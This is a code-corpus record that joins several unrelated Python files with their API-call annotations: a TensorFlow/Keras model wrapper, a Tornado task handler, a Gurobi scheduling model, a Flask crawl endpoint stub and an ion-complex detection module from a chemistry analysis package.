"used."
)
return self.get_probs(*args, **kwargs)
def get_logits(self, x, **kwargs):
"""
:param x: A symbolic representation (Tensor) of the network input
:return: A symbolic representation (Tensor) of the output logits
(i.e., the values fed as inputs to the softmax layer).
"""
outputs = self.fprop(x, **kwargs)
if self.O_LOGITS in outputs:
return outputs[self.O_LOGITS]
raise NotImplementedError(
str(type(self)) + "must implement `get_logits`"
" or must define a " + self.O_LOGITS + " output in `fprop`"
)
def get_predicted_class(self, x, **kwargs):
"""
:param x: A symbolic representation (Tensor) of the network input
:return: A symbolic representation (Tensor) of the predicted label
"""
return tf.argmax(self.get_logits(x, **kwargs), axis=1)
def get_probs(self, x, **kwargs):
"""
:param x: A symbolic representation (Tensor) of the network input
:return: A symbolic representation (Tensor) of the output
probabilities (i.e., the output values produced by the softmax layer).
"""
d = self.fprop(x, **kwargs)
if self.O_PROBS in d:
output = d[self.O_PROBS]
min_prob = tf.reduce_min(output)
max_prob = tf.reduce_max(output)
asserts = [
utils_tf.assert_greater_equal(min_prob, tf.cast(0.0, min_prob.dtype)),
utils_tf.assert_less_equal(max_prob, tf.cast(1.0, min_prob.dtype)),
]
with tf.control_dependencies(asserts):
output = tf.identity(output)
return output
elif self.O_LOGITS in d:
return tf.nn.softmax(logits=d[self.O_LOGITS])
else:
raise ValueError("Cannot find probs or logits.")
def fprop(self, x, **kwargs):
"""
Forward propagation to compute the model outputs.
:param x: A symbolic representation of the network input
:return: A dictionary mapping layer names to the symbolic
representation of their output.
"""
raise NotImplementedError("`fprop` not implemented.")
def get_params(self):
"""
Provides access to the model's parameters.
:return: A list of all Variables defining the model parameters.
"""
if hasattr(self, "params"):
return list(self.params)
# Catch eager execution and assert function overload.
try:
if tf.executing_eagerly():
raise NotImplementedError(
"For Eager execution - get_params " "must be overridden."
)
except AttributeError:
pass
# For graph-based execution
scope_vars = tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES, self.scope + "/"
)
if len(scope_vars) == 0:
self.make_params()
scope_vars = tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES, self.scope + "/"
)
assert len(scope_vars) > 0
# Make sure no parameters have been added or removed
if hasattr(self, "num_params"):
if self.num_params != len(scope_vars):
print("Scope: ", self.scope)
print("Expected " + str(self.num_params) + " variables")
print("Got " + str(len(scope_vars)))
for var in scope_vars:
print("\t" + str(var))
assert False
else:
self.num_params = len(scope_vars)
return scope_vars
def make_params(self):
    """Create all Variables to be returned later by get_params.

    A no-op by default. Models that need a forward pass to build their
    parameters set ``needs_dummy_fprop=True`` in the constructor; then a
    placeholder input is created once and pushed through ``fprop``.
    """
    if not self.needs_dummy_fprop:
        return
    if hasattr(self, "_dummy_input"):
        # Dummy pass already performed; nothing left to create.
        return
    self._dummy_input = self.make_input_placeholder()
    self.fprop(self._dummy_input)
def get_layer_names(self):
    """Return the list of exposed layers for this model (abstract)."""
    raise NotImplementedError
def get_layer(self, x, layer, **kwargs):
    """Return the symbolic output of one named layer.

    :param x: tensor, the input to the network
    :param layer: str, the name of the layer to fetch
    :param **kwargs: dict, extra optional params forwarded to self.fprop
    :return: the symbolic output stored under ``layer``
    """
    outputs = self.fprop(x, **kwargs)
    return outputs[layer]
def make_input_placeholder(self):
    """Create and return a placeholder representing an input to the model.

    Implementations should respect context managers (e.g. "with tf.device")
    and must not just return a reference to a single pre-created
    placeholder.
    """
    msg = str(type(self)) + " does not implement make_input_placeholder"
    raise NotImplementedError(msg)
def make_label_placeholder(self):
    """Create and return a placeholder representing class labels.

    Implementations should respect context managers (e.g. "with tf.device")
    and must not just return a reference to a single pre-created
    placeholder.
    """
    msg = str(type(self)) + " does not implement make_label_placeholder"
    raise NotImplementedError(msg)
def __hash__(self):
    # Identity-based hash: consistent with __eq__, which compares by
    # object identity, so equal objects always hash equally.
    return hash(id(self))
def __eq__(self, other):
    # Equality is object identity, matching the id()-based __hash__ above.
    return self is other
class KerasModelWrapper(AModel):
    """
    An implementation of `Model` that wraps a Keras model. It
    specifically exposes the hidden features of a model by creating new models.
    The symbolic graph is reused and so there is little overhead. Splitting
    in-place operations can incur an overhead.
    """

    def __init__(self, model, num_class=10):
        """
        Create a wrapper for a Keras model
        :param model: A Keras model
        :param num_class: int, number of output classes (default 10)
        """
        super(KerasModelWrapper, self).__init__()
        if model is None:
            raise ValueError('model argument must be supplied.')
        self.model = model
        # Lazily-built multi-output model; created on first fprop() call.
        self.keras_model = None
        self.num_classes = num_class

    def _get_softmax_name(self):
        """
        Looks for the name of the softmax layer.
        :return: Softmax layer name
        :raises Exception: if no matching layer is found
        """
        for layer in self.model.layers:
            cfg = layer.get_config()
            # NOTE(review): matches a layer literally named 'average_1' —
            # presumably the output-averaging layer of this particular
            # architecture; confirm before reusing with other models.
            if cfg['name'] == 'average_1':
                return layer.name
        raise Exception("No softmax layers found")

    def _get_logits_name(self):
        """
        Looks for the name of the layer producing the logits.
        :return: name of layer producing the logits
        """
        softmax_name = self._get_softmax_name()
        softmax_layer = self.model.get_layer(softmax_name)
        if not isinstance(softmax_layer, Activation):
            # In this case, the activation is part of another layer
            return softmax_name
        # Keras renamed inbound_nodes -> _inbound_nodes in 2.1.3; support both.
        if hasattr(softmax_layer, 'inbound_nodes'):
            warnings.warn(
                "Please update your version to keras >= 2.1.3; "
                "support for earlier keras versions will be dropped on "
                "2018-07-22")
            node = softmax_layer.inbound_nodes[0]
        else:
            node = softmax_layer._inbound_nodes[0]
        logits_name = node.inbound_layers[0].name
        return logits_name

    def get_logits(self, x):
        """
        :param x: A symbolic representation of the network input.
        :return: A symbolic representation of the logits
        """
        # logits_name = self._get_logits_name()
        # logits_layer = self.get_layer(x, logits_name)
        # # Need to deal with the case where softmax is part of the
        # # logits layer
        # if logits_name == self._get_softmax_name():
        #     softmax_logit_layer = self.get_layer(x, logits_name)
        #     # The final op is the softmax. Return its input
        #     logits_layer = softmax_logit_layer._op.inputs[0]
        prob = self.get_probs(x)
        # NOTE(review): log of the probabilities equals the true logits
        # only up to an additive per-sample constant (log-sum-exp).
        logits = tf.log(prob)
        return logits

    def get_probs(self, x):
        """
        :param x: A symbolic representation of the network input.
        :return: A symbolic representation of the probs
        """
        return self.model(x)

    def get_layer_names(self):
        """
        :return: Names of all the layers kept by Keras
        """
        layer_names = [x.name for x in self.model.layers]
        return layer_names

    def fprop(self, x):
        """
        Exposes all the layers of the model returned by get_layer_names.
        :param x: A symbolic representation of the network input
        :return: A dictionary mapping layer names to the symbolic
        representation of their output.
        """
        from tensorflow.keras.models import Model as KerasModel
        if self.keras_model is None:
            # Get the input layer
            new_input = self.model.get_input_at(0)
            # Make a new model that returns each of the layers as output
            out_layers = [x_layer.output for x_layer in self.model.layers]
            self.keras_model = KerasModel(new_input, out_layers)
        # and get the outputs for that model on the input x
        outputs = self.keras_model(x)
        # Keras only returns a list for outputs of length >= 1, if the model
        # is only one layer, wrap a list
        if len(self.model.layers) == 1:
            outputs = [outputs]
        # compute the dict to return
        fprop_dict = dict(zip(self.get_layer_names(), outputs))
        return fprop_dict

    def get_layer(self, x, layer):
        """
        Expose the hidden features of a model given a layer name.
        :param x: A symbolic representation of the network input
        :param layer: The name of the hidden layer to return features at.
        :return: A symbolic representation of the hidden features
        :raise: NoSuchLayerError if `layer` is not in the model.
        """
        # Return the symbolic representation for this layer.
        output = self.fprop(x)
        try:
            requested = output[layer]
        except KeyError:
            raise NoSuchLayerError()
        return requested
| [
"tensorflow.reduce_min",
"tensorflow.executing_eagerly",
"tensorflow.keras.models.Model",
"tensorflow.reduce_max",
"tensorflow.control_dependencies",
"tensorflow.nn.softmax",
"warnings.warn",
"tensorflow.identity",
"tensorflow.cast",
"tensorflow.log",
"tensorflow.get_collection"
] | [((1815, 2306), 'warnings.warn', 'warnings.warn', (['"""Model.__call__ is deprecated. The call is ambiguous as to whether the output should be logits or probabilities, and getting the wrong one can cause serious problems. The output actually is probabilities, which are a very dangerous thing to use as part of any interface for cleverhans, because softmax probabilities are prone to gradient masking.On or after 2019-04-24, this method will change to raise an exception explaining why Model.__call__ should not be used."""'], {}), "(\n 'Model.__call__ is deprecated. The call is ambiguous as to whether the output should be logits or probabilities, and getting the wrong one can cause serious problems. The output actually is probabilities, which are a very dangerous thing to use as part of any interface for cleverhans, because softmax probabilities are prone to gradient masking.On or after 2019-04-24, this method will change to raise an exception explaining why Model.__call__ should not be used.'\n )\n", (1828, 2306), False, 'import warnings\n'), ((5313, 5382), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.TRAINABLE_VARIABLES', "(self.scope + '/')"], {}), "(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope + '/')\n", (5330, 5382), True, 'import tensorflow as tf\n'), ((10660, 10672), 'tensorflow.log', 'tf.log', (['prob'], {}), '(prob)\n', (10666, 10672), True, 'import tensorflow as tf\n'), ((3782, 3803), 'tensorflow.reduce_min', 'tf.reduce_min', (['output'], {}), '(output)\n', (3795, 3803), True, 'import tensorflow as tf\n'), ((3827, 3848), 'tensorflow.reduce_max', 'tf.reduce_max', (['output'], {}), '(output)\n', (3840, 3848), True, 'import tensorflow as tf\n'), ((5044, 5066), 'tensorflow.executing_eagerly', 'tf.executing_eagerly', ([], {}), '()\n', (5064, 5066), True, 'import tensorflow as tf\n'), ((5495, 5564), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.TRAINABLE_VARIABLES', "(self.scope + '/')"], {}), 
"(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope + '/')\n", (5512, 5564), True, 'import tensorflow as tf\n'), ((9629, 9766), 'warnings.warn', 'warnings.warn', (['"""Please update your version to keras >= 2.1.3; support for earlier keras versions will be dropped on 2018-07-22"""'], {}), "(\n 'Please update your version to keras >= 2.1.3; support for earlier keras versions will be dropped on 2018-07-22'\n )\n", (9642, 9766), False, 'import warnings\n'), ((11726, 11759), 'tensorflow.keras.models.Model', 'KerasModel', (['new_input', 'out_layers'], {}), '(new_input, out_layers)\n', (11736, 11759), True, 'from tensorflow.keras.models import Model as KerasModel\n'), ((4075, 4107), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['asserts'], {}), '(asserts)\n', (4098, 4107), True, 'import tensorflow as tf\n'), ((4134, 4153), 'tensorflow.identity', 'tf.identity', (['output'], {}), '(output)\n', (4145, 4153), True, 'import tensorflow as tf\n'), ((4232, 4270), 'tensorflow.nn.softmax', 'tf.nn.softmax', ([], {'logits': 'd[self.O_LOGITS]'}), '(logits=d[self.O_LOGITS])\n', (4245, 4270), True, 'import tensorflow as tf\n'), ((3929, 3957), 'tensorflow.cast', 'tf.cast', (['(0.0)', 'min_prob.dtype'], {}), '(0.0, min_prob.dtype)\n', (3936, 3957), True, 'import tensorflow as tf\n'), ((4013, 4041), 'tensorflow.cast', 'tf.cast', (['(1.0)', 'min_prob.dtype'], {}), '(1.0, min_prob.dtype)\n', (4020, 4041), True, 'import tensorflow as tf\n')] |
from .db_handler import cursor
from tornado import concurrent
import tornado.web
executor = concurrent.futures.ThreadPoolExecutor(8)
def start_task(arg):
    """Placeholder async task body: report the start and signal success."""
    # Async task
    print("The Task has started")
    return True
def stop_task(arg):
    """Placeholder async task body: report the stop and signal success."""
    # Async task
    print("The Task has stopped")
    return True
class HandlerStart(tornado.web.RequestHandler):
    """POST handler: launch the background task for an existing user."""

    def post(self, username):
        """Start the task if ``username`` exists in the users table.

        Writes "started" on success, "User Doesn't exist" otherwise;
        HTTP status is always 200.

        :param username: user name extracted from the URL route
        """
        cursor.execute("SELECT * FROM users")
        users = cursor.fetchall()
        # Rows are (id, name, email); the user exists if any name matches.
        # Replaces the original dict/set round-trip with a single scan.
        exists = any(row[1] == username for row in users)
        if exists:
            # Fire-and-forget on the shared thread pool.
            executor.submit(start_task, username)
            response = "started"
        else:
            response = "User Doesn't exist"
        self.write('request accepted |' + str(username) + ' | ' + str(response))
class HandlerStop(tornado.web.RequestHandler):
    """POST handler: stop the background task for an existing user."""

    def post(self, username):
        """Stop the task if ``username`` exists in the users table.

        Writes "stopped" on success, "User Doesn't exist" otherwise;
        HTTP status is always 200.

        :param username: user name extracted from the URL route
        """
        cursor.execute("SELECT * FROM users")
        users = cursor.fetchall()
        # Rows are (id, name, email); the user exists if any name matches.
        # Replaces the original dict/set round-trip with a single scan.
        exists = any(row[1] == username for row in users)
        if exists:
            # Fire-and-forget on the shared thread pool.
            executor.submit(stop_task, username)
            response = "stopped"
        else:
            response = "User Doesn't exist"
        self.write('request accepted |' + str(username) + ' | ' + str(response))
| [
"tornado.concurrent.futures.ThreadPoolExecutor"
] | [((92, 132), 'tornado.concurrent.futures.ThreadPoolExecutor', 'concurrent.futures.ThreadPoolExecutor', (['(8)'], {}), '(8)\n', (129, 132), False, 'from tornado import concurrent\n')] |
import gurobipy as gp
from gurobipy import GRB
from scheduler.utils import *
import csv
# Instructor -> list of TimeSlot availability, filled by create_W_matrix().
W = {}
# Teaching days considered by the scheduler.
days = ["MONDAY", "TUESDAY", "WEDNESDAY", "THURSDAY", "FRIDAY"]
# Departments included in the model.
departments = ["CMPE"]
def create_W_matrix():
    """Populate the global availability map ``W``.

    Walks every available-slot record and appends a ``TimeSlot`` entry per
    non-empty slot under that record's instructor key.
    """
    global W
    for record in get_all_available_slots():
        for raw_slot in record.slots:
            if raw_slot is None:
                continue
            W.setdefault(record.instructor, []).append(TimeSlot(raw_slot))
def does_intersect(slot1, slot2):
    """Return True when two time slots overlap on the same day.

    Each slot occupies the half-open range ``[slot, slot + length)`` on its
    day. This generalizes the original hard-coded 1/2-length checks to
    arbitrary positive lengths, while giving identical answers for lengths
    1 and 2.

    :param slot1: object with ``day``, ``slot`` and ``length`` attributes
    :param slot2: object with the same attributes
    :return: bool, True iff the occupied ranges share at least one position
    """
    if slot1.day != slot2.day:
        return False
    # Half-open interval overlap: each starts before the other one ends.
    return (slot1.slot < slot2.slot + slot2.length
            and slot2.slot < slot1.slot + slot1.length)
def solve():
    """Build and optimize the timetable MIP, then dump the schedule to CSV.

    Decision variable X[f, c, s, r] is 1 when instructor f teaches course c
    in slot s in classroom r. Results are appended to per-classroom and
    per-instructor CSV files under results/.
    """
    m = gp.Model('Scheduling')
    create_W_matrix()
    # Binary assignment variables over (instructor, course, slot, room).
    X = m.addVars(allInstructors, allCourses, allSlots, allClassrooms, name="X", vtype=GRB.BINARY)
    # An instructor teaches at most one (course, room) in any slot.
    constr1 = m.addConstrs(
        gp.quicksum(X[f, c, s, r] for c in allCourses for r in allClassrooms) <= 1
        for f in allInstructors for s in allSlots)
    # A room hosts at most one (instructor, course) in any slot.
    constr2 = m.addConstrs(
        (gp.quicksum(X[f, c, s, r] for f in allInstructors for c in allCourses) <= 1
         for s in allSlots for r in allClassrooms))
    # Course quota must fit the capacity of the room it is assigned to.
    constr3 = m.addConstrs((gp.quicksum(
        X[f, c, s, r] * c.quota for f in allInstructors for s in allSlots) <= gp.quicksum(
        X[f, c, s, r] * r.capacity for f in allInstructors for s in allSlots))
        for c in allCourses for r in allClassrooms)
    # No assignment in slots the instructor did not declare available (W).
    constr4 = m.addConstrs(
        gp.quicksum(X[f, c, s, r] for c in allCourses for r in allClassrooms) == 0
        for f in allInstructors for s in allSlots
        if f.id in W and s not in W[f.id])
    # Scheduled slot lengths must sum to each course's weekly hours.
    constr5 = m.addConstrs(gp.quicksum(
        X[f, c, s, r] * s.length for s in allSlots for r in allClassrooms for f in allInstructors) == c.hours
        for c in allCourses)
    # Instructors may only teach courses on their course list.
    constr6 = m.addConstrs(
        gp.quicksum(X[f, c, s, r] for s in allSlots for r in allClassrooms) == 0
        for f in allInstructors for c in allCourses
        if c.id not in f.courses)
    # No instructor double-booking across related (presumably overlapping)
    # slots — confirm getRelatedSlots semantics.
    constr7 = m.addConstrs(
        gp.quicksum(X[f, c, rs, r] for rs in getRelatedSlots(s) for r in allClassrooms for c in allCourses) <= 1
        for f in allInstructors for s in allSlots)
    # A course meets at most once per day.
    constr8 = m.addConstrs(
        gp.quicksum(X[f, c, s, r] for r in allClassrooms for f in allInstructors for s in allSlots if s.day == d) <= 1
        for d in days for c in allCourses)
    # To allow splitting a course's hours into 2 + 1 sessions:
    # each instructor-course pair uses at most two sessions.
    constr9 = m.addConstrs(
        gp.quicksum(X[f, c, s, r] for r in allClassrooms for s in allSlots) <= 2
        for f in allInstructors for c in allCourses
    )
    # No room double-booking across related slots.
    constr11 = m.addConstrs(
        gp.quicksum(X[f, c, rs, r] for rs in getRelatedSlots(s) for f in allInstructors for c in allCourses) <= 1
        for r in allClassrooms for s in allSlots)
    # constr10 = m.addConstrs(
    #     gp.quicksum(X[f, c, ss, r] for c in allCourses if 100 * Class <= c.code < 100 * (Class + 1) and c.department == d for f in allInstructors for r in allClassrooms for ss in allSlots if does_intersect(ss, s)) <= 1 for Class in range(1, 5) for d in departments for s in allSlots
    # )
    # Objective: maximize the total number of scheduled sessions.
    obj = gp.quicksum(
        X[f, c, s, r] for f in allInstructors for s in allSlots for c in allCourses for r in allClassrooms)
    m.setObjective(obj, GRB.MAXIMIZE)
    m.optimize()
    solution = m.getAttr('X', X)
    for instructor, course, slot, classroom in X.keys():
        # Binary vars may come back as floats; > 0.5 means "selected".
        if solution[instructor, course, slot, classroom] > 0.5:
            with open('results/{}.csv'.format(classroom.code), 'a+') as f:
                writer = csv.writer(f)
                writer.writerow(
                    [slot.day, slot.slot, slot.length, instructor.full_name, course.department, course.code])
            with open('results/{}.csv'.format(instructor.full_name), 'a+') as f:
                writer = csv.writer(f)
                writer.writerow([slot.day, slot.slot, slot.length, classroom.code, course.department, course.code])
| [
"gurobipy.quicksum",
"csv.writer",
"gurobipy.Model"
] | [((979, 1001), 'gurobipy.Model', 'gp.Model', (['"""Scheduling"""'], {}), "('Scheduling')\n", (987, 1001), True, 'import gurobipy as gp\n'), ((3503, 3618), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] for f in allInstructors for s in allSlots for c in\n allCourses for r in allClassrooms)'], {}), '(X[f, c, s, r] for f in allInstructors for s in allSlots for c in\n allCourses for r in allClassrooms)\n', (3514, 3618), True, 'import gurobipy as gp\n'), ((1167, 1236), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] for c in allCourses for r in allClassrooms)'], {}), '(X[f, c, s, r] for c in allCourses for r in allClassrooms)\n', (1178, 1236), True, 'import gurobipy as gp\n'), ((1335, 1405), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] for f in allInstructors for c in allCourses)'], {}), '(X[f, c, s, r] for f in allInstructors for c in allCourses)\n', (1346, 1405), True, 'import gurobipy as gp\n'), ((1495, 1573), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] * c.quota for f in allInstructors for s in allSlots)'], {}), '(X[f, c, s, r] * c.quota for f in allInstructors for s in allSlots)\n', (1506, 1573), True, 'import gurobipy as gp\n'), ((1587, 1672), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] * r.capacity for f in allInstructors for s in allSlots)'], {}), '(X[f, c, s, r] * r.capacity for f in allInstructors for s in\n allSlots)\n', (1598, 1672), True, 'import gurobipy as gp\n'), ((1792, 1861), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] for c in allCourses for r in allClassrooms)'], {}), '(X[f, c, s, r] for c in allCourses for r in allClassrooms)\n', (1803, 1861), True, 'import gurobipy as gp\n'), ((1983, 2089), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] * s.length for s in allSlots for r in allClassrooms for f in\n allInstructors)'], {}), '(X[f, c, s, r] * s.length for s in allSlots for r in\n allClassrooms for f in allInstructors)\n', (1994, 2089), True, 'import gurobipy as gp\n'), ((2196, 2263), 
'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] for s in allSlots for r in allClassrooms)'], {}), '(X[f, c, s, r] for s in allSlots for r in allClassrooms)\n', (2207, 2263), True, 'import gurobipy as gp\n'), ((2585, 2694), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] for r in allClassrooms for f in allInstructors for s in\n allSlots if s.day == d)'], {}), '(X[f, c, s, r] for r in allClassrooms for f in allInstructors for\n s in allSlots if s.day == d)\n', (2596, 2694), True, 'import gurobipy as gp\n'), ((2829, 2896), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] for r in allClassrooms for s in allSlots)'], {}), '(X[f, c, s, r] for r in allClassrooms for s in allSlots)\n', (2840, 2896), True, 'import gurobipy as gp\n'), ((3941, 3954), 'csv.writer', 'csv.writer', (['f'], {}), '(f)\n', (3951, 3954), False, 'import csv\n'), ((4208, 4221), 'csv.writer', 'csv.writer', (['f'], {}), '(f)\n', (4218, 4221), False, 'import csv\n')] |
import sys,os
import time
import datetime
import random
import re
import json
import requests
from flask import Flask, jsonify
from flasgger import Swagger # pip install flasgger
from flasgger import swag_from
from flask import request
from api_helper import GretNet_API_Helper
# Absolute directory of this file, with a trailing slash.
LOCAL_PATH = os.path.abspath(os.path.dirname(__file__))+"/"
# Make this directory and its parent importable.
sys.path.insert(0,LOCAL_PATH)
sys.path.insert(0,LOCAL_PATH+"../")
#0v1# JC Apr 8, 2021 Base setup
#Helper=GretNet_API_Helper()
## OpenAPI
#
#/crawl_domain
def handle_crawl_domain_request():  # *args,**kwargs):
    """Submit a domain to crawl
    ---
    post:
      summary: Handle submit domain to crawl requests
      consumes:
        - application/json
      parameters:
        - in: body
          name: meta
          description: Domain to crawl
          schema:
            type: object
            properties:
              url:
                type: string
      responses:
        200:
          description: Post accepted and processed.
    """
    # request.json raises on a missing/invalid JSON body; treat as empty.
    try:
        the_json = request.json
    except Exception:
        the_json = {}
    if the_json:
        # NOTE(review): Helper is commented out at module scope
        # (#Helper=GretNet_API_Helper()); this call raises NameError until
        # that line is restored.
        Helper.cache_request('crawl_domain', the_json, id='')
    # Best-effort debug print of the raw body.
    try:
        print(str(request.json))
    except Exception:
        pass
    result = {}
    result['status_code'] = 200
    return jsonify(result)
#TBD: add node or relation, standard search
def dev1():
    """Development branch entry point; currently an empty stub."""
    return None
if __name__=='__main__':
    # Run every listed dev branch by looking its function up in globals().
    branches=['dev1']
    for b in branches:
        globals()[b]()
"""
"""
"""
"""
| [
"os.path.dirname",
"sys.path.insert",
"flask.jsonify"
] | [((349, 379), 'sys.path.insert', 'sys.path.insert', (['(0)', 'LOCAL_PATH'], {}), '(0, LOCAL_PATH)\n', (364, 379), False, 'import sys, os\n'), ((379, 417), 'sys.path.insert', 'sys.path.insert', (['(0)', "(LOCAL_PATH + '../')"], {}), "(0, LOCAL_PATH + '../')\n", (394, 417), False, 'import sys, os\n'), ((1350, 1365), 'flask.jsonify', 'jsonify', (['result'], {}), '(result)\n', (1357, 1365), False, 'from flask import Flask, jsonify\n'), ((317, 342), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (332, 342), False, 'import sys, os\n')] |
"""
paw_structure.ion
-----------------
Ion complex detection using geometric :ref:`algorithm<Control_ION_algorithm>`.
Main routine is :func:`.ion_find_parallel`.
Dependencies:
:py:mod:`functools`
:py:mod:`miniutils`
:py:mod:`numpy`
:py:mod:`pandas`
:mod:`.neighbor`
:mod:`.utility`
:class:`.Snap`
.. autosummary::
ion_find_parallel
ion_load
ion_save
ion_single
"""
import numpy as np
import pandas as pd
from functools import partial
import miniutils.progress_bar as progress
# MODULES WITHIN PROJECT
from . import neighbor
from . import utility
from .tra import Snap
########################################################################################################################
# FIND ION COMPLEX FOR A SINGLE SNAPSHOT
########################################################################################################################
# INPUT
# class Snap snap snapshot containing all information
# str id1 identifier for atom used as center (e.g. 'MN'); only one allowed to be in snap
# str id2 identifier for atoms as possible first neighbors (e.g. 'O_')
# str id3 identifier for atoms as possible neighbors of first neighbors (e.g. 'H_')
# float cut1 cutoff distance for first neighbor search
# float cut2 cutoff distance for second neighbor search
#####
# OUTPUT
# pandas DataFrame contains the whole complex centered around id1
########################################################################################################################
def ion_single(snap, id1, id2, id3, cut1, cut2):
    """Detect the ion complex in a single snapshot.

    Starting from the single atom of species ``id1``, collect its ``id2``
    neighbors within ``cut1`` and, around those, their ``id3`` neighbors
    within ``cut2``; return all of them bundled as a new snapshot.

    Args:
        snap (:class:`.Snap`): snapshot with the atomic information
        id1 (str): species identifier of the central ion (e.g. 'MN')
        id2 (str): species identifier of the first shell (e.g. 'O\_')
        id3 (str): species identifier of the second shell (e.g. 'H\_')
        cut1 (float): cutoff radius for the first-shell search
        cut2 (float): cutoff radius for the second-shell search

    Returns:
        :class:`.Snap`: snapshot holding only the atoms of the ion complex

    Todo:
        Implement possibility for more atoms of type id1 or allow selection
        by name.
    """
    # Exactly one central ion of species id1 must be present.
    if len(snap.atoms[snap.atoms['id'] == id1]) != 1:
        utility.err('ion_single', 0, [len(snap.atoms[snap.atoms['id'] == id1])])
    # The three species identifiers must be pairwise distinct.
    if len({id1, id2, id3}) != 3:
        utility.err('ion_single', 1, [id1, id2, id3])
    # First shell: id2 neighbors of the central id1 atom.
    shell1 = neighbor.neighbor_name(snap, id1, id2, cut1)
    center_names = [entry[0] for entry in shell1]
    shell1_names = [name for entry in shell1 for name in entry[1:]]
    # Second shell: id3 neighbors of the first-shell atoms only.
    shell2 = neighbor.neighbor_name(snap, id2, id3, cut2, names=shell1_names)
    shell2_names = [name for entry in shell2 for name in entry[1:]]
    # Pull the full atom rows for every collected name, center first.
    frames = [
        snap.atoms.loc[snap.atoms['name'].isin(names)]
        for names in (center_names, shell1_names, shell2_names)
    ]
    comp = pd.concat(frames)
    return Snap(snap.iter, snap.time, snap.cell, None, None, dataframe=comp)
########################################################################################################################
# SAVE INFORMATION FROM ion_find TO FILE <root>.ext FOR LATER ANALYSIS
# TODO: check if snapshots is empty
########################################################################################################################
# INPUT
# str root root name for saving file
# list class Snap snapshots list with information to be saved
# str id1 identifier for atom used as center (e.g. 'MN'); only one allowed to be in snap
# str id2 identifier for atoms as possible first neighbors (e.g. 'O_')
# str id3 identifier for atoms as possible neighbors of first neighbors (e.g. 'H_')
# float cut1 cutoff distance for first neighbor search
# float cut2 cutoff distance for second neighbor search
# str ext (optional) extension for the saved file: name = root + ext
########################################################################################################################
def ion_save(root, snapshots, id1, id2, id3, cut1, cut2, ext='.ion'):
    """
    Save results to file :ref:`Output_ion`.
    Args:
        root (str): root name for saving file
        snapshots (list[:class:`.Snap`]): list of snapshots containing an ion complex
        id1 (str): identifier for atom used as center (e.g. 'MN')
        id2 (str): identifier for atoms as possible first neighbors (e.g. 'O\_')
        id3 (str): identifier for atoms as possible neighbors of first neighbors (e.g. 'H\_')
        cut1 (float): cutoff distance for first neighbor search
        cut2 (float): cutoff distance for second neighbor search
        ext (str, optional): default ".ion" - extension for the saved file: name = root + ext
    Todo:
        Check if snapshots is empty.
    """
    # open file
    path = root + ext
    try:
        f = open(path, 'w')
    except IOError:
        utility.err_file('ion_save', path)
    # write header: search parameters and time range of the trajectory
    f.write(utility.write_header())
    f.write("ION COMPLEXES\n")
    f.write("%-14s%14.8f\n" % ("T1", snapshots[0].time))
    f.write("%-14s%14.8f\n" % ("T2", snapshots[-1].time))
    f.write("%-14s%14d\n" % ("SNAPSHOTS", len(snapshots)))
    f.write("%-14s%14s\n" % ("ID1", id1))
    f.write("%-14s%14s\n" % ("ID2", id2))
    f.write("%-14s%14s\n" % ("ID3", id3))
    f.write("%-14s%14.8f\n" % ("CUT1", cut1))
    f.write("%-14s%14.8f\n" % ("CUT2", cut2))
    f.write("%-14s\n" % ("UNIT CELL"))
    np.savetxt(f, snapshots[0].cell, fmt="%14.8f")
    # write structure information: one dashed separator + header per snapshot,
    # then the atom table (name, id, index, x, y, z)
    for i in range(len(snapshots)):
        f.write("-" * 84 + "\n")
        f.write("%-14s%-14.8f%-14s%-14d%-14s%-14d\n" %
                ("TIME", snapshots[i].time, "ITERATION", snapshots[i].iter, "ATOMS", len(snapshots[i].atoms)))
        f.write("%-14s%-14s%-14s%14s%14s%14s\n" % ('NAME', 'ID', 'INDEX', 'X', 'Y', 'Z'))
        np.savetxt(f, snapshots[i].atoms, fmt="%-14s%-14s%-14d%14.8f%14.8f%14.8f")
    f.close()
    return
########################################################################################################################
# LOAD INFORMATION PREVIOUSLY SAVED BY ion_save()
# WARNING: READING IS LINE SENSITIVE! ONLY USE ON UNCHANGED FILES WRITTEN BY ion_save()
########################################################################################################################
# INPUT
# str root root name for the file to be loaded
# str ext (optional) extension for the file to be loaded: name = root + ext
#####
# OUTPUT
# list class Snap snapshots list of all information
########################################################################################################################
def ion_load(root, ext='.ion'):
    """
    Load information from the :ref:`Output_ion` file previously created by
    :func:`.ion_save`.
    Args:
        root (str): root name for the file to be loaded
        ext (str, optional): default ".ion" - extension for the file to be
            loaded: name = root + ext
    Returns:
        list[:class:`.Snap`]: list of snapshots containing an ion complex
    Note:
        Reading is line sensitive. Do not alter the output file before
        loading.
    """
    path = root + ext
    try:
        # Context manager guarantees the handle is closed; the previous
        # version opened the file and never closed it.
        with open(path, 'r') as f:
            text = f.readlines()  # read text as lines
    except IOError:
        utility.err_file('ion_load', path)
    for i in range(len(text)):
        text[i] = text[i].split()  # split each line into list of strings
    snapshots = []  # storage list
    for i in range(len(text)):
        if len(text[i]) > 1:
            if text[i][0] == 'UNIT':
                cell = np.array(text[i+1:i+4], dtype=float)  # get unit cell
            if text[i][0] == "TIME":  # trigger of a new snapshot block
                # header line: TIME <t> ITERATION <it> ATOMS <n>
                iteration = int(text[i][3])
                time = float(text[i][1])
                n_atoms = int(text[i][5])
                table = np.array(text[i + 2:i + 2 + n_atoms])
                atoms = {}
                atoms['name'] = table[:, 0]
                atoms['id'] = table[:, 1]
                atoms['index'] = np.array(table[:, 2], dtype=int)
                df = pd.DataFrame(data=atoms)
